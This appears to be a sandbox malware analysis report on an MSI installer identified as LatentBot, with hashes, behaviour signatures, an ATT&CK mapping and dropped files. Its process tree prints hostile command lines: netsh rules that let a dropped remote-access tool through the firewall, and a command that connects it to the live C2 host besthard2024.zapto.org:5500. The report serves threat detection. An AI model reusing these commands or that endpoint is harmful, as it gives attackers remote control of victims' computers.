Overview

overview

10

Static

static

1

0dbeaab616...7e.msi

windows7-x64

10

0dbeaab616...7e.msi

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-10-2024 01:04

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    0dbeaab616c483b81d9e9ed8dda14a3a8f3b024130f8fab840e7b9f3a7b1787e.msi

  • Size

    6.7MB

  • MD5

    e21b2080c98beb0f04307a5a25630e23

  • SHA1

    8fc24ad51e8d61324fe8de1be667862e9238cbbb

  • SHA256

    0dbeaab616c483b81d9e9ed8dda14a3a8f3b024130f8fab840e7b9f3a7b1787e

  • SHA512

    3706fde6569bccb39e2c58e86c60050c73bcdbe5c7eb05849ced33c75b5a1c3b080746c2e27420c6fffcd3497e1b1b6ab87e1b2d371a80fa3ae27851a64cfbea

  • SSDEEP

    196608:QK4NkomkEmjut8DMcj4IWKPDNwmtoOCvHLNkAIdc:QKfkEmjuSMcxWKLNwunA5

Score
10/10
latentbotdiscoveryevasionpersistenceprivilege_escalationtrojan

Malware Config

Extracted

Family

latentbot

C2

besthard2024.zapto.org

Signatures

  • LatentBot

    Modular trojan written in Delphi which has been in-the-wild since 2013.

    trojanlatentbot
  • Blocklisted process makes network request 1 IoCs
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Modifies Windows Firewall 2 TTPs 2 IoCs
    evasion
  • Drops file in Windows directory 13 IoCs
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
    persistenceprivilege_escalation
  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Delays execution with timeout.exe 10 IoCs
    evasion
  • Disables Windows logging functionality 2 TTPs

    Changes registry settings to disable Windows Event logging.

  • Kills process with taskkill 3 IoCs
    evasion
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\0dbeaab616c483b81d9e9ed8dda14a3a8f3b024130f8fab840e7b9f3a7b1787e.msi
    1⤵
    • Blocklisted process makes network request
    • Enumerates connected drives
    • Event Triggered Execution: Installer Packages
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:3252
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3256
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding A0046BE3624D672AFAB7454D2F0B48D8
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      PID:5016
    • C:\Windows\Installer\MSI9DFB.tmp
      "C:\Windows\Installer\MSI9DFB.tmp" /DontWait /HideWindow /dir "C:\Games\" "C:\Games\PrintDrivers.exe" /HideWindow "C:\Games\PrintDrivers.cmd"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:220
  • C:\Games\PrintDrivers.exe
    "C:\Games\PrintDrivers.exe" /HideWindow "C:\Games\PrintDrivers.cmd"
    1⤵
    • Executes dropped EXE
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    PID:4784
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Games\PrintDrivers.cmd" "
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:404
    • C:\Windows\system32\mode.com
      Mode 90,20
      2⤵
        PID:3048
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
        2⤵
          PID:2488
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:2796
          • C:\Windows\system32\reg.exe
            Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
            3⤵
              PID:5068
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic process where (name="PrintDriver.exe") get commandline
            2⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4060
          • C:\Windows\system32\findstr.exe
            findstr /i "PrintDriver.exe"
            2⤵
              PID:1976
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\PrintDriver.txt"
              2⤵
                PID:3320
              • C:\Windows\system32\cmd.exe
                cmd
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:2512
                • C:\Windows\system32\mode.com
                  Mode 90,20
                  3⤵
                    PID:3276
                  • C:\Windows\system32\netsh.exe
                    netsh firewall add allowedprogram program="C:\Games\PrintDriver.exe" name="MyApplication" mode=ENABLE scope=ALL
                    3⤵
                    • Modifies Windows Firewall
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:4664
                  • C:\Windows\system32\netsh.exe
                    netsh firewall add allowedprogram program="C:\Games\PrintDriver.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL
                    3⤵
                    • Modifies Windows Firewall
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:4984
                  • C:\Windows\System32\Wbem\WMIC.exe
                    wmic process where (name="PrintDriver.exe") get commandline
                    3⤵
                      PID:2764
                    • C:\Windows\system32\findstr.exe
                      findstr /i "PrintDriver.exe"
                      3⤵
                        PID:2648
                      • C:\Games\PrintDriver.exe
                        C:\Games\PrintDriver.exe -autoreconnect ID:5115257 -connect besthard2024.zapto.org:5500 -run
                        3⤵
                        • Executes dropped EXE
                        • Suspicious use of FindShellTrayWindow
                        • Suspicious use of SendNotifyMessage
                        PID:4796
                    • C:\Windows\system32\timeout.exe
                      timeout /t 1
                      2⤵
                      • Delays execution with timeout.exe
                      PID:2080
                    • C:\Windows\system32\taskkill.exe
                      taskkill /im rundll32.exe /f
                      2⤵
                      • Kills process with taskkill
                      PID:5076
                    • C:\Windows\system32\timeout.exe
                      timeout /t 1
                      2⤵
                      • Delays execution with timeout.exe
                      PID:1104
                    • C:\Windows\system32\taskkill.exe
                      taskkill /im rundll32.exe /f
                      2⤵
                      • Kills process with taskkill
                      PID:3204
                    • C:\Windows\system32\timeout.exe
                      timeout /t 1
                      2⤵
                      • Delays execution with timeout.exe
                      PID:3232
                    • C:\Windows\system32\taskkill.exe
                      taskkill /im rundll32.exe /f
                      2⤵
                      • Kills process with taskkill
                      PID:4452
                    • C:\Games\PrintDrivers.exe
                      C:\Games\PrintDrivers.exe /HideWindow C:\Games\driverhelp.cmd
                      2⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      PID:1376
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c ""C:\Games\driverhelp.cmd" "
                    1⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4368
                    • C:\Windows\system32\mode.com
                      Mode 90,20
                      2⤵
                        PID:4744
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
                        2⤵
                          PID:4552
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:4904
                          • C:\Windows\system32\reg.exe
                            Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
                            3⤵
                              PID:1264
                          • C:\Windows\system32\timeout.exe
                            timeout /t 20
                            2⤵
                            • Delays execution with timeout.exe
                            PID:3760
                          • C:\Windows\system32\timeout.exe
                            timeout /t 20
                            2⤵
                            • Delays execution with timeout.exe
                            PID:4344
                          • C:\Windows\system32\timeout.exe
                            timeout /t 20
                            2⤵
                            • Delays execution with timeout.exe
                            PID:1852
                          • C:\Windows\system32\timeout.exe
                            timeout /t 20
                            2⤵
                            • Delays execution with timeout.exe
                            PID:5016
                          • C:\Windows\system32\timeout.exe
                            timeout /t 20
                            2⤵
                            • Delays execution with timeout.exe
                            PID:4056
                          • C:\Windows\system32\timeout.exe
                            timeout /t 20
                            2⤵
                            • Delays execution with timeout.exe
                            PID:3560
                          • C:\Windows\system32\timeout.exe
                            timeout /t 20
                            2⤵
                            • Delays execution with timeout.exe
                            PID:2820

                        Network

                        MITRE ATT&CK Enterprise v15

                        Reconnaissance

                        Resource Development

                        Initial Access

                        Execution

                        Persistence

                        Create or Modify System Process

                        1
                        T1543

                        Windows Service

                        1
                        T1543.003

                        Event Triggered Execution

                        2
                        T1546

                        Installer Packages

                        1
                        T1546.016

                        Netsh Helper DLL

                        1
                        T1546.007

                        Privilege Escalation

                        Create or Modify System Process

                        1
                        T1543

                        Windows Service

                        1
                        T1543.003

                        Event Triggered Execution

                        2
                        T1546

                        Installer Packages

                        1
                        T1546.016

                        Netsh Helper DLL

                        1
                        T1546.007

                        Defense Evasion

                        Impair Defenses

                        2
                        T1562

                        Disable or Modify System Firewall

                        1
                        T1562.004

                        Disable or Modify Tools

                        1
                        T1562.001

                        Modify Registry

                        1
                        T1112

                        System Binary Proxy Execution

                        1
                        T1218

                        Msiexec

                        1
                        T1218.007

                        Credential Access

                        Discovery

                        Peripheral Device Discovery

                        1
                        T1120

                        Query Registry

                        1
                        T1012

                        System Information Discovery

                        2
                        T1082

                        System Location Discovery

                        1
                        T1614

                        System Language Discovery

                        1
                        T1614.001

                        Lateral Movement

                        Collection

                        Command and Control

                        Exfiltration

                        Impact

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\Config.Msi\e579993.rbs
                          Filesize

                          423KB

                          MD5

                          5f79a7e4a86d0bfe52c776a9643adb5b

                          SHA1

                          e02c3638a1949ad7570a93acc2567bed2530c6a5

                          SHA256

                          432039e3f7b5b4c0816c9621c0da2b2b4f522cd3c3810527c978ecc133e9639a

                          SHA512

                          e7cb29c3f5e230bffc179ef13d130aeb010db7cbee10d8a796b0976239237234fa0bb2328cd6c0f69497bcf8bd894e78ca323dee4e21582a18cf5d246be0223c

                          Download Submit

                        • C:\Games\PrintDriver.exe
                          Filesize

                          2.8MB

                          MD5

                          27c1c264c6fce4a5f44419f1783db8e0

                          SHA1

                          e071486e4dfef3a13f958a252d7000d3ce7bfd89

                          SHA256

                          29379afd1ca5439c82931d623fda335174dc416e5b013591457fa1f7bbe564db

                          SHA512

                          a80a512be6f152e8737cd5d0a0a2a193eaf88f3bfb7ed6b7695d227e195db278e2734ebfc9fe48a68cfb13e4e5bb7fb4825019cfa2210ba741ecf8b11f954a98

                          Download Submit

                        • C:\Games\PrintDriver.txt
                          Filesize

                          1KB

                          MD5

                          6eb13f7936a83f4c44842029914aad6e

                          SHA1

                          7b9b27731d4ca6f996ce68c5d68b4d653e31d915

                          SHA256

                          8d9bb49947d9dc7fa7be7310149a99f13a0c02580fd996aae31c69d673775c49

                          SHA512

                          227788193867b2f99a62ae792d91562ad46ea3fa0855cf6ef28fc0de31d43f2e671c6ef50e534f0235f1f663769715bef162913a554e86e581fe05455373623e

                          Download Submit

                        • C:\Games\PrintDrivers.cmd
                          Filesize

                          1KB

                          MD5

                          eacc690f71a77685f030bef23b506b91

                          SHA1

                          03b911ba997d44028bf515ea44fe4813b4b4a785

                          SHA256

                          0f1d30740f2e46b22b86fb01acdabbd02440d7dbebe963a405fb3a5661b23263

                          SHA512

                          9870aa4dc699b74bfc8fb53df0c74686913f42ea2321bee39786e5be696fb081e3dfdac1b312f3c439c14e3061f35cefe820ef1ac5c853274ca0c867bf50a54d

                          Download Submit

                        • C:\Games\PrintDrivers.exe
                          Filesize

                          403KB

                          MD5

                          29ed7d64ce8003c0139cccb04d9af7f0

                          SHA1

                          8172071a639681934d3dc77189eb88a04c8bcfac

                          SHA256

                          e48aac5148b261371c714b9e00268809832e4f82d23748e44f5cfbbf20ca3d3f

                          SHA512

                          4bdd4bf57eaf0c9914e483e160182db7f2581b0e2adc133885bf0f364123d849d247d3f077a58d930e80502a7f27f1457f7e2502d466aec80a4fbeebd0b59415

                          Download Submit

                        • C:\Games\UltraVNC.ini
                          Filesize

                          1KB

                          MD5

                          cb5b8a5789c15957c039ff3ce988c1a2

                          SHA1

                          4de9a626f04bc7c619fdb68e5585739855ded2d1

                          SHA256

                          a11a72865948a8d6a88df530108c3b8ba3e8b4ac6316ac22443af81fa1c3daf4

                          SHA512

                          68dd583237ea70702d76d9a2a607bbb8f2e2a1e4285de347b4e23faa0063b51f20f5a84cbe907ef4c123eba0add1c99cb4f9f1e13ddff97b34bb1e7c18825e32

                          Download Submit

                        • C:\Games\driverhelp.cmd
                          Filesize

                          870B

                          MD5

                          fd3b5847ddb8a31413951c0aa870ab95

                          SHA1

                          e3e91e3e9fa442cd1937422120de91da87973ddb

                          SHA256

                          e4f5e16dfe9bbe6d63f266103c35c0035a2d4014f516420190b7cfafb02b08ad

                          SHA512

                          5d8599f7d6f0824ab30118f5680bf89d28c1e7e9de4ed61af9074cb9d339619d59dab8e5818dc93dcf5b27ad9e8a863c5d082f8f829aa8c4a026ec5da2454096

                          Download Submit

                        • C:\Windows\Installer\MSI9A2D.tmp
                          Filesize

                          997KB

                          MD5

                          ec6ebf65fe4f361a73e473f46730e05c

                          SHA1

                          01f946dfbf773f977af5ade7c27fffc7fe311149

                          SHA256

                          d3614d7bece53e0d408e31da7d9b0ff2f7285a7dd544c778847ed0c5ded5d52f

                          SHA512

                          e4d7aafa75d07a3071d2739d18b4c2b0a3798f754b339c349db9a6004d031bf02f3970b030cec4a5f55b4c19f03794b0ce186a303d936c222e7e6e8726fffff7

                          Download Submit

                        • C:\Windows\Installer\MSI9DFB.tmp
                          Filesize

                          418KB

                          MD5

                          432827ec55428786a447b3d848d963b7

                          SHA1

                          029901586604f3ab1b0bd18868469a96db0ef470

                          SHA256

                          5a4e76f840fe7d9872164c6c3ce85f4dd0405e661c04638e0b8a91157398bbf0

                          SHA512

                          efe03d3446b07180a12d8cd8d0b6d25dd6da5b445c6d61125b0e81c848a98b78f502a6c7c8c7dfc87b3d5beafdea100ac6580e0d28f2cfb99eda90a19449c226

                          Download Submit